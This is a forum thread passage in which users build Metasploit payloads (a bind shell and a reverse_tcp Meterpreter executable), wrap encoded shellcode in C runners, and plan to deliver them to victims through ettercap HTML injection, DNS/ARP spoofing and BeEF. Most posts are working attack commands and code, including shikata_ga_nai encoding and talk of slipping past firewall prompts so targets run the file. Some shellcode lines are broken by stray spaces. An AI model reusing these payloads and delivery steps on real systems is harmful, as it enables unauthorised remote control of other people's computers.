Page 2 of 2 FirstFirst 12
Results 11 to 19 of 19

Thread: ettercap filter html injection meterpeter.exe

  1. #11
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default

    i found this http://www.okc2600.com/viewtopic.php?p=4062

    ./msfpayload windows/shell_bind_tcp LPORT=30000 R | ./msfencode -e x86/shikata_ga_nai c > ~/binder.c
    Code:
    unsigned char buf[] = 
    "\xba\x40\x5f\x2d\x18\xd9\xd0\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
    "\x46\x83\xc6\x04\x31\x56\x11\x03\x56\x11\xe2\xb5\xa3\xc5\x4e"
    "\x35\x5c\x16\x3c\x60\x0a\x41\x49\xe6\x96\x75\xc6\xb3\xea\x0e"
    "\x8c\x3e\x6b\x10\xc7\xcb\xc1\x0a\x9c\x91\xf5\x2b\x49\xc6\xc4"
    "\x62\x06\x3c\xa2\x74\xf6\x0d\x4b\x8a\x37\xad\x1f\x4b\xd8\x59"
    "\x67\x6d\xd7\xac\x66\xaa\x03\x5c\x53\x48\xf0\xb4\xd1\x51\x73"
    "\xee\x3d\x93\x6f\x68\xb5\x9f\x24\xff\x93\x83\xbb\x14\xa8\xb8"
    "\x30\xeb\x47\x2b\x44\xda\x57\xf3\x17\x41\x03\xce\xa0\x79\xed"
    "\xa4\x80\x20\x75\xb2\xf8\x59\x2e\xc8\x71\x06\xcd\x5b\x9e\x33"
    "\xb6\x53\xf2\x2b\xc7\x2a\xfa\x47\x28\x64\x8b\x50\x84\xe1\xd8"
    "\x94\x84\x63\x1f\xfe\x5a\x6f\xe0\xff\x5c\x70\xb1\xa8\x0a\x23"
    "\xb8\xb3\x5b\xdc\xba\x3b\x9c\x73\xbb\x3b\x9c\xc5\xa5\x23\x7b"
    "\x8d\xcf\x23\x6a\x22\x16\x69\x0c\x62\xe0\x98\x60\x5f\x1e\x9e"
    "\x40\x37\xb2\x6c\xe8\x84\x06\x90\x4d\x66\x2d\x88\x20\x87\x65"
    "\x21\x1d\xfe\x49\xbc\xd7\x15\x24\xbb\x4e\x47\xeb\x3c\x44\xe8"
    "\xf4\x97\xa1\xaf\x83\x13\x24\xad\x66\x30\x1f\x66\x78\x71\xa0"
    "\xd3\xae\x4c\x9e\x8c\xfe\xfe\x4e\x6d\xaf\xbe\x3e\x92\x1a\x1a"
    "\x36\xab\xcd\xa2\xe0\x35\x08\x4a\xf3\x35\x14\xee\x7a\xd4\x7e"
    "\xfe\x2d\x40\x80\xab\xed\x04\x3e\x0d\xb8\x19\x58\xb7\x12\x5b"
    "\x43\xbf\xcc\x31\x8c\x40\xa5\xc9\x05\x7d\x2c\xd2\x43\xd2\xe6"
    "\x2d\x3e\xcc\xf7\x01\xcb";
    i took the code above and come up with this
    Code:
    #include <stdio.h>
    
    /* 8192 */
    char payload[] = 
    "\xba\x40\x5f\x2d\x18\xd9\xd0\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
    "\x46\x83\xc6\x04\x31\x56\x11\x03\x56\x11\xe2\xb5\xa3\xc5\x4e"
    "\x35\x5c\x16\x3c\x60\x0a\x41\x49\xe6\x96\x75\xc6\xb3\xea\x0e"
    "\x8c\x3e\x6b\x10\xc7\xcb\xc1\x0a\x9c\x91\xf5\x2b\x49\xc6\xc4"
    "\x62\x06\x3c\xa2\x74\xf6\x0d\x4b\x8a\x37\xad\x1f\x4b\xd8\x59"
    "\x67\x6d\xd7\xac\x66\xaa\x03\x5c\x53\x48\xf0\xb4\xd1\x51\x73"
    "\xee\x3d\x93\x6f\x68\xb5\x9f\x24\xff\x93\x83\xbb\x14\xa8\xb8"
    "\x30\xeb\x47\x2b\x44\xda\x57\xf3\x17\x41\x03\xce\xa0\x79\xed"
    "\xa4\x80\x20\x75\xb2\xf8\x59\x2e\xc8\x71\x06\xcd\x5b\x9e\x33"
    "\xb6\x53\xf2\x2b\xc7\x2a\xfa\x47\x28\x64\x8b\x50\x84\xe1\xd8"
    "\x94\x84\x63\x1f\xfe\x5a\x6f\xe0\xff\x5c\x70\xb1\xa8\x0a\x23"
    "\xb8\xb3\x5b\xdc\xba\x3b\x9c\x73\xbb\x3b\x9c\xc5\xa5\x23\x7b"
    "\x8d\xcf\x23\x6a\x22\x16\x69\x0c\x62\xe0\x98\x60\x5f\x1e\x9e"
    "\x40\x37\xb2\x6c\xe8\x84\x06\x90\x4d\x66\x2d\x88\x20\x87\x65"
    "\x21\x1d\xfe\x49\xbc\xd7\x15\x24\xbb\x4e\x47\xeb\x3c\x44\xe8"
    "\xf4\x97\xa1\xaf\x83\x13\x24\xad\x66\x30\x1f\x66\x78\x71\xa0"
    "\xd3\xae\x4c\x9e\x8c\xfe\xfe\x4e\x6d\xaf\xbe\x3e\x92\x1a\x1a"
    "\x36\xab\xcd\xa2\xe0\x35\x08\x4a\xf3\x35\x14\xee\x7a\xd4\x7e"
    "\xfe\x2d\x40\x80\xab\xed\x04\x3e\x0d\xb8\x19\x58\xb7\x12\x5b"
    "\x43\xbf\xcc\x31\x8c\x40\xa5\xc9\x05\x7d\x2c\xd2\x43\xd2\xe6"
    "\x2d\x3e\xcc\xf7\x01\xcb";
    
    /* 512 */
    char comment[] = "                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                ";
    
    int main(int argc, char **argv) {
    	(*(void (*)()) payload)();
    	return(0);
    }
    i tryed to compile this with gcc meterpreter.c -o meterpreter.exe
    But im sure its clear that i dont know what im doing with this source lol

  2. #12
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default

    I GOT IT WOOT

    http://markremark.blogspot.com/2008/...e-and-exe.html
    and it looks like you can dubble encode it or something like that

    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.6,LPORT=100 R | ./msfencode -t exe > meta.exe

  3. #13
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    14

    Default

    Awsome, i was thinking that the payload may be getting some bad chars when it gets run trough twice, but i see he has fixed this, or so it seems. I am about to go home for an early Thanksgiving but ill take my laptop and work with the meterpreter/http ...all others set off the firewall IDS on Vista. But again, since the port is used it doesnt work. The XP os i have just runs it, firewall never asks for permission. I'll see what i come up with. Im going to take one of the auto_pwn servers as a base and use that as the connection point, so that port 80 is free to connect back for shell. This way when the target clicks "RUN" it will do just that, instead of IDS saying "do you want to open the firewall for this app.?", i will let you know.
    Again, awsome find.

    --EDIT--
    btw, my initial thought is that the double encode is putting a \x00 or another null byte of some kind either during the encode, or the target cpu is goofing the shellcode somewhere. My laptop is packed up for the trip at the moment but if i remember correctly, the initial single encode came back with (+-)300 chars of payload, ... and the original double encode gave (+)700-800 chars, a lot of room for a null byte, or misinterpretation by the target machine.

    --EDIT EDIT--
    also gcc cant do that, as far as its concerned you have a misc. piece of info with no instructions on what to do with it. You would need to finish the code. The piece your looking at now is declaring that unsigned buff[] = "shellcode" but you would need to finish it with an

    init main()
    run unsighned buff[]

    bad example of sudo code i know.
    but it would be the same as if i told you that "the book you want is at the Library!"
    ...but if i don't give you instructions to the building, that doesn't do you any good.

  4. #14
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    14

    Default I hope this answers your question.

    Hey bigmac
    alright im going to try to do something of a tutorial on getting 'code' from the windows-binaries folder.
    First thing im going to do is go into whats going on with msfpayload, how to use the output... and then well get into all that.

    My initial thought was that it could be done, however ...to mush together the hex with user input would require more c than im willing to go into on this particular tutorial. that said, here we go...
    alright the first thing is programing, if you want to take this further i would suggest learning a little bit of C and assembly. Im going to refer back to your post where u used an msfpayload option for a tcp shell and it gave you the output:
    unsigned char buf[] =
    "\xba\x40\x5f\x2d\x18\xd9\xd0\xd9\x74\x24\xf4\x5e\ x2b\xc9\xb1"
    "\x46\x83\xc6\x04\x31\x56\x11\x03\x56\x11\xe2\xb5\ xa3\xc5\x4e"
    "\x35\x5c\x16\x3c\x60\x0a\x41\x49\xe6\x96\x75\xc6\ xb3\xea\x0e"
    "\x8c\x3e\x6b\x10\xc7\xcb\xc1\x0a\x9c\x91\xf5\x2b\ x49\xc6\xc4"
    "\x62\x06\x3c\xa2\x74\xf6\x0d\x4b\x8a\x37\xad\x1f\ x4b\xd8\x59"
    "\x67\x6d\xd7\xac\x66\xaa\x03\x5c\x53\x48\xf0\xb4\ xd1\x51\x73"
    "\xee\x3d\x93\x6f\x68\xb5\x9f\x24\xff\x93\x83\xbb\ x14\xa8\xb8"
    "\x30\xeb\x47\x2b\x44\xda\x57\xf3\x17\x41\x03\xce\ xa0\x79\xed"
    "\xa4\x80\x20\x75\xb2\xf8\x59\x2e\xc8\x71\x06\xcd\ x5b\x9e\x33"
    "\xb6\x53\xf2\x2b\xc7\x2a\xfa\x47\x28\x64\x8b\x50\ x84\xe1\xd8"
    "\x94\x84\x63\x1f\xfe\x5a\x6f\xe0\xff\x5c\x70\xb1\ xa8\x0a\x23"
    "\xb8\xb3\x5b\xdc\xba\x3b\x9c\x73\xbb\x3b\x9c\xc5\ xa5\x23\x7b"
    "\x8d\xcf\x23\x6a\x22\x16\x69\x0c\x62\xe0\x98\x60\ x5f\x1e\x9e"
    "\x40\x37\xb2\x6c\xe8\x84\x06\x90\x4d\x66\x2d\x88\ x20\x87\x65"
    "\x21\x1d\xfe\x49\xbc\xd7\x15\x24\xbb\x4e\x47\xeb\ x3c\x44\xe8"
    "\xf4\x97\xa1\xaf\x83\x13\x24\xad\x66\x30\x1f\x66\ x78\x71\xa0"
    "\xd3\xae\x4c\x9e\x8c\xfe\xfe\x4e\x6d\xaf\xbe\x3e\ x92\x1a\x1a"
    "\x36\xab\xcd\xa2\xe0\x35\x08\x4a\xf3\x35\x14\xee\ x7a\xd4\x7e"
    "\xfe\x2d\x40\x80\xab\xed\x04\x3e\x0d\xb8\x19\x58\ xb7\x12\x5b"
    "\x43\xbf\xcc\x31\x8c\x40\xa5\xc9\x05\x7d\x2c\xd2\ x43\xd2\xe6"
    "\x2d\x3e\xcc\xf7\x01\xcb";

    Alright, thats nice looking but we have to do something with it. Or at least tell the computer too.

    lets start with some smaller/simpler code.
    so im gonna open a shell, cd over to framework3, and use ...

    # ./msfpayload linux/x86/exec CMD="ls -la" C
    should return ...

    /*
    * linux/x86/exec - 42 bytes
    * it wont let me put the link
    * AppendExit=false, CMD=ls -la, PrependSetresuid=false,
    * PrependSetuid=false, PrependSetreuid=false
    */
    unsigned char buf[] =
    "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\ x2f\x73\x68"
    "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x07\x00\ x00\x00\x6c"
    "\x73\x20\x2d\x6c\x61\x00\x57\x53\x89\xe1\xcd\x80" ;

    alright lets do something with this...
    make a text file and name it "first.c"

    insert this into it.


    char shellcode[] =
    "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\ x2f\x73\x68"
    "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x07\x00\ x00\x00\x6c"
    "\x73\x20\x2d\x6c\x61\x00\x57\x53\x89\xe1\xcd\x80" ;

    int main(int argc, char **argv) {
    int(*func)();
    func = (int (*)()) shellcode;
    (int)(*func)();
    }
    Alright now compile it with...
    # gcc -o first first.c
    then run
    # ./first
    (or u could just use "first" ....its executable)

    should give you a list equal to ls -la.

    Alright that should give you a good indication of what to do with the code given by msfpayload.
    You should be able to make your own mini C programs with the given example. (and for others, yes there are other ways to do it, such as def a pointer to it, but again, off the top o my head, thats what u get)

    Now then, for the main part and to answer your question... you didn't really specify which program you wanted to do this with... encoding the ALREADY compiled data, in my mind, can be done. However, i see a problem. If the program accepts user input... there really isn't any way for it to collect said data (actually i would think that given an argv[1] or similar when ran in the C code should do it... but im not getting into that right now)
    anyway...here we go.
    And keep in mind im doing a trial run of everything as i type this.

    Well i think im going to use an example for this that is short and to the point.
    I think you will understand why at the end of this tut.

  5. #15
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    14

    Default part 2

    Alright lets get into something with some MEAT to it already.
    Go back to your msfpayload and type this...
    **NOTE: the double lines in the Dir Address... it will not read otherwise ...and i forget why off the top of my head at the moment....bash something or other(dont hate me cuz i have alzheimer's)

    # ./msfpayload windows/exec EXITFUNC=seh CMD=C:\\WINDOWS\\System32\\calc.exe C
    this should give you this.

    /*
    * windows/exec - 141 bytes
    * again no links
    * EXITFUNC=seh, CMD=C:\WINDOWS\System32\calc.exe
    */
    unsigned char buf[] =
    "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\ x78\x01\xef"
    "\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\ x01\xee\x31"
    "\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\ xeb\xf4\x3b"
    "\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\ x0c\x4b\x8b"
    "\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\ x04\xc3\x5f"
    "\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b\x40\x0c\x8b\ x70\x1c\xad"
    "\x8b\x68\x08\x89\xf8\x83\xc0\x6a\x50\x68\xf0\x8a\ x04\x5f\x68"
    "\x98\xfe\x8a\x0e\x57\xff\xe7\x43\x3a\x5c\x57\x49\ x4e\x44\x4f"
    "\x57\x53\x5c\x53\x79\x73\x74\x65\x6d\x33\x32\x5c\ x63\x61\x6c"
    "\x63\x2e\x65\x78\x65\x00";
    Alright, now theres your shellcode to start calc.exe for a windows computer.
    * You may want to put it into the C program above and run it to check, ..i have already done this, and it works. But just in case, Feel free.

    Once again with msfpayload, im going to make this an executable and name it myfile.exe and im going to funnel it all into the root window.

    # ./msfpayload windows/exec EXITFUNC=seh CMD=C:\\WINDOWS\\System32\\calc.exe X > /root/myfile.exe
    Ok so now we have an EXE file in our home/root directory.
    now type...
    # cd
    # ls
    you should see your file (myfile.exe), or just a visial check will do, i put it there for ease of usage and movement.
    * im moving these files with a usbdrive from computer to computer (**checking them on Vista and Xp-sp3)


    At this time if you would like to, again, move it over to windows and try it.
    It should work and start the calculator program.

    Back at the shell type this:
    # objdump -d myfile.exe
    Your output should look something like this ....
    ################################################## #####
    myfile.exe: file format efi-app-ia32

    Disassembly of section .text:

    0000000000401000 <.text>:
    401000: 31 c0 xor %eax,%eax
    401002: 68 34 10 40 00 push $0x401034
    401007: 64 ff 30 pushl %fs%eax)
    40100a: 64 89 20 mov %esp,%fs%eax)
    40100d: 6a 40 push $0x40
    40100f: 68 00 30 00 00 push $0x3000
    401014: 68 00 00 10 00 push $0x100000
    401019: 6a 00 push $0x0
    40101b: e8 24 00 00 00 call 0x401044
    401020: 89 c5 mov %eax,%ebp
    401022: 89 c7 mov %eax,%edi
    401024: be 00 20 40 00 mov $0x402000,%esi
    401029: b9 00 08 00 00 mov $0x800,%ecx
    40102e: f3 a5 rep movsl %ds%esi),%es%edi)
    401030: ff d5 call *%ebp
    401032: 90 nop
    401033: 90 nop
    401034: ff 25 3c 40 40 00 jmp *0x40403c
    40103a: 90 nop
    40103b: 90 nop
    ...
    401044: ff 25 40 40 40 00 jmp *0x404040
    40104a: 90 nop
    40104b: 90 nop
    ...
    401054: ff (bad)
    401055: ff (bad)
    401056: ff (bad)
    401057: ff 00 incl (%eax)
    401059: 00 00 add %al,(%eax)
    40105b: 00 ff add %bh,%bh
    40105d: ff (bad)
    40105e: ff (bad)
    40105f: ff 00 incl (%eax)
    401061: 00 00 add %al,(%eax)
    ...
    ################################################## ########
    lets take a look at this from the top.
    Going left to right
    We have file format and type
    The section it is disassembling
    and the start of memory number and again <section> of disassembly
    (lemme bring it down)
    ################################################## #########
    myfile.exe: file format efi-app-ia32

    Disassembly of section .text:

    0000000000401000 <.text>:
    401000: 31 c0 xor %eax,%eax
    401002: 68 34 10 40 00 push $0x401034
    401007: 64 ff 30 pushl %fs%eax)
    40100a: 64 89 20 mov %esp,%fs%eax)
    ################################################## ##########
    1 2 3
    ok at point 1 we have memory addresses
    point 2 we have hex
    and point 3 is the assembly

    Take a look at point 2

    31 0c
    68 34 10 40 00
    does this look familiar??
    What if i wrote it like this ..

    \x31\x0c
    \x68\x34\x10\x40\x00
    BINGO, if you'll take all the hex code and revamp it into \x** format, you now have your shellcode for the program.

  6. #16
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    14

    Default part 3

    So im going to do just that...

    char shellcode[] =
    "\x31\xc0\x68\x34\x10\x40\x00\x64\xff\x30\x64\x89\ x20\x6a\x40\x68\x00\x30\x00"
    "\x00\x68\x00\x00\x10\x00\x6a\x00\xe8\x24\x00\x00\ x00\x89\xc5\x89\xc7\xbe\x00"
    "\x20\x40\x00\xb9\x00\x08\x00\x00\xf3\xa5\xff\xd5\ x90\x90\xff\x25\x3c\x40\x40"
    "\x00\x90\x90\xff\x25\x40\x40\x40\x00\x90\x90\xff\ xff\xff\xff\x00\x00\x00\x00"
    "\xff\xff\xff\xff\x00\x00\x00";

    int main(int argc, char **argv) {
    int(*func)();
    func = (int (*)()) shellcode;
    (int)(*func)();
    Now compile that again as
    # gcc -o myfile myfile.c
    Take that and run it on a windows box ....opens calc.exe
    Alright, now for the encoding.
    take just the shellcode aka,
    "\x31\xc0\x68\x34\x10\x40\x00\x64\xff\x30\x64\x89\ x20\x6a\x40\x68\x00\x30\x00"
    "\x00\x68\x00\x00\x10\x00\x6a\x00\xe8\x24\x00\x00\ x00\x89\xc5\x89\xc7\xbe\x00"
    "\x20\x40\x00\xb9\x00\x08\x00\x00\xf3\xa5\xff\xd5\ x90\x90\xff\x25\x3c\x40\x40"
    "\x00\x90\x90\xff\x25\x40\x40\x40\x00\x90\x90\xff\ xff\xff\xff\x00\x00\x00\x00"
    "\xff\xff\xff\xff\x00\x00\x00";
    and copy that into a text file and run it through the encoder.

    # ./msfencode -i shell.txt -t c
    This should ouput something like ...

    [*] x86/shikata_ga_nai succeeded, final size 374

    unsigned char buf[] =
    "\xdb\xd3\xd9\x74\x24\xf4\x29\xc9\xbb\x3e\x80\xd0\ xc5\x5a\xb1"
    "\x57\x31\x5a\x1a\x03\x5a\x1a\x83\xea\xfc\xe2\xcb\ xa2\x8c\xbd"
    "\x00\x92\x70\x46\x05\xe4\xd4\xce\xff\x3c\xb9\x56\ xcc\x08\x1d"
    "\xdf\x03\x41\xc1\x67\x57\x91\xa5\xef\xa7\xe1\x09\ x68\xf1\x35"
    "\xee\xf0\x9b\x53\x52\x79\x50\xac\x36\x01\xa0\xf8\ x9a\x89\xf4"
    "\x39\x7f\x12\x36\x0a\x23\x9a\x00\x0b\x87\x22\x58\ xfb\x6b\xab"
    "\x96\xc3\xcf\x33\xe6\x03\xac\xbb\x35\x54\x10\x44\ x09\xa4\x8a"
    "\xbe\x4b\x98\xb2\x8e\xbb\x7c\x3b\xd9\x83\x20\xc3\ x15\xc3\x84"
    "\x4b\x66\x13\x69\xd4\xb7\x63\xcd\x5c\x88\xb3\xb1\ xe4\xde\xd2"
    "\x15\x6d\x2f\x24\xfa\xf5\x2a\x7c\x5e\x7e\x87\x48\ x02\x06\xd7"
    "\x80\xe6\x8e\x27\xd0\x4a\x17\x78\x20\x2f\x9f\x40\ x79\x93\x27"
    "\xd2\x4c\x77\xa0\x2c\x97\xdb\x28\x2e\xd0\xbf\xb0\ xd2\x7b\x1c"
    "\x39\x23\xb3\xbe\xb3\x61\xef\xc6\xf1\x55\x53\x4f\ xc2\xa5\x37"
    "\xd7\x1a\xf6\x9b\x5f\x39\xcf\x7f\xd8\x8d\x1f\x23\ x60\xde\x67"
    "\x87\xe8\x2e\xa8\x6b\x71\x7f\xf8\xcf\xf9\x19\xcb\ xb3\x81\x84"
    "\x1e\x17\x0a\x21\x07\xfb\x92\xc9\xf2\x5f\x1b\x2b\ xcd\x03\xa3"
    "\x72\x1d\xe7\x2b\xe3\x3b\x4b\xb4\xd9\xf6\x2f\x3c\ x2d\x9a\x93"
    "\xc4\x65\x6c\x77\x4d\xb2\xbc\xa5\xa7\x98\xe0\xd1\ x87\xec\x44"
    "\x59\xd1\x3c\x29\xe1\x18\x0d\x8d\x69\x3d\x0b\x71\ xf1\xf3\xe6"
    "\xd5\x79\xc0\x38\xba\x01\x1c\x09\x1e\x89\x68\x59\ xc2\x11\xa1"
    "\xa9\xa6\x99\xf8\xf9\x0a\x21\xc2\xc9\xee\xa9\x52\ x4c\x53\x31"
    "\xfd\xf6\x37\xb9\x67\x91\x9b\x41\x0e\x3b\x78\xc9\ xfe\xf3\xdc"
    "\x51\xcf\xc3\x80\xd9\x1f\x14\x65\x61\x50\x64\xb7\ x9b\xb2\xd8"
    "\xcf\xfd\xd4\xbc\x57\x67\x7f\x61\xd0\x01\x19\xc5\ x58\xab\x83"
    "\xa9\xe0\x03\x7c\x0e\x69\x53\x4c\xf2\xf1\xa3\x9c\ x28\x39";
    Alright lets give it a whurl with the c program.

    char shellcode[] =
    "\xdb\xd3\xd9\x74\x24\xf4\x29\xc9\xbb\x3e\x80\xd0\ xc5\x5a\xb1"
    "\x57\x31\x5a\x1a\x03\x5a\x1a\x83\xea\xfc\xe2\xcb\ xa2\x8c\xbd"
    "\x00\x92\x70\x46\x05\xe4\xd4\xce\xff\x3c\xb9\x56\ xcc\x08\x1d"
    "\xdf\x03\x41\xc1\x67\x57\x91\xa5\xef\xa7\xe1\x09\ x68\xf1\x35"
    "\xee\xf0\x9b\x53\x52\x79\x50\xac\x36\x01\xa0\xf8\ x9a\x89\xf4"
    "\x39\x7f\x12\x36\x0a\x23\x9a\x00\x0b\x87\x22\x58\ xfb\x6b\xab"
    "\x96\xc3\xcf\x33\xe6\x03\xac\xbb\x35\x54\x10\x44\ x09\xa4\x8a"
    "\xbe\x4b\x98\xb2\x8e\xbb\x7c\x3b\xd9\x83\x20\xc3\ x15\xc3\x84"
    "\x4b\x66\x13\x69\xd4\xb7\x63\xcd\x5c\x88\xb3\xb1\ xe4\xde\xd2"
    "\x15\x6d\x2f\x24\xfa\xf5\x2a\x7c\x5e\x7e\x87\x48\ x02\x06\xd7"
    "\x80\xe6\x8e\x27\xd0\x4a\x17\x78\x20\x2f\x9f\x40\ x79\x93\x27"
    "\xd2\x4c\x77\xa0\x2c\x97\xdb\x28\x2e\xd0\xbf\xb0\ xd2\x7b\x1c"
    "\x39\x23\xb3\xbe\xb3\x61\xef\xc6\xf1\x55\x53\x4f\ xc2\xa5\x37"
    "\xd7\x1a\xf6\x9b\x5f\x39\xcf\x7f\xd8\x8d\x1f\x23\ x60\xde\x67"
    "\x87\xe8\x2e\xa8\x6b\x71\x7f\xf8\xcf\xf9\x19\xcb\ xb3\x81\x84"
    "\x1e\x17\x0a\x21\x07\xfb\x92\xc9\xf2\x5f\x1b\x2b\ xcd\x03\xa3"
    "\x72\x1d\xe7\x2b\xe3\x3b\x4b\xb4\xd9\xf6\x2f\x3c\ x2d\x9a\x93"
    "\xc4\x65\x6c\x77\x4d\xb2\xbc\xa5\xa7\x98\xe0\xd1\ x87\xec\x44"
    "\x59\xd1\x3c\x29\xe1\x18\x0d\x8d\x69\x3d\x0b\x71\ xf1\xf3\xe6"
    "\xd5\x79\xc0\x38\xba\x01\x1c\x09\x1e\x89\x68\x59\ xc2\x11\xa1"
    "\xa9\xa6\x99\xf8\xf9\x0a\x21\xc2\xc9\xee\xa9\x52\ x4c\x53\x31"
    "\xfd\xf6\x37\xb9\x67\x91\x9b\x41\x0e\x3b\x78\xc9\ xfe\xf3\xdc"
    "\x51\xcf\xc3\x80\xd9\x1f\x14\x65\x61\x50\x64\xb7\ x9b\xb2\xd8"
    "\xcf\xfd\xd4\xbc\x57\x67\x7f\x61\xd0\x01\x19\xc5\ x58\xab\x83"
    "\xa9\xe0\x03\x7c\x0e\x69\x53\x4c\xf2\xf1\xa3\x9c\ x28\x39";

    int main(int argc, char **argv) {
    int(*func)();
    func = (int (*)()) shellcode;
    (int)(*func)();
    }
    It should run the calc.exe yet again.
    I hope that is the information you were looking for. What exactly in the folder were you hoping to encode or use? Lemme know and ill work on it.

  7. #17
    mcurran
    Guest

    Default

    Would there be a way to write executable instructions like this directly in the html filter, instead of in the created/downloaded meterpreter file? It would be good if we had a simple redirect with an automatic reverse_tcp on the redirect connect, instead of having the client download, get warned numerous times, and then install...

  8. #18
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    14

    Default

    Hi McCurran,
    I would never be one to say that anything is impossible, but I think the easiest way to do this may be with beEF, or the browser exploitation framework. I have noticed that ettercap does not work to well with IE8, allthough i have not kept up with newer versions, posts, workarounds, etc... beef may be more effective if you simply rely on DNS redirection from ettercap to the beef server.
    Just a thought...

  9. #19
    mcurran
    Guest

    Default

    You would still need to use ettercap or other dns and arp spoofing applications in order to redirect and create zombies in beef, wouldn't you?

Page 2 of 2 FirstFirst 12

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •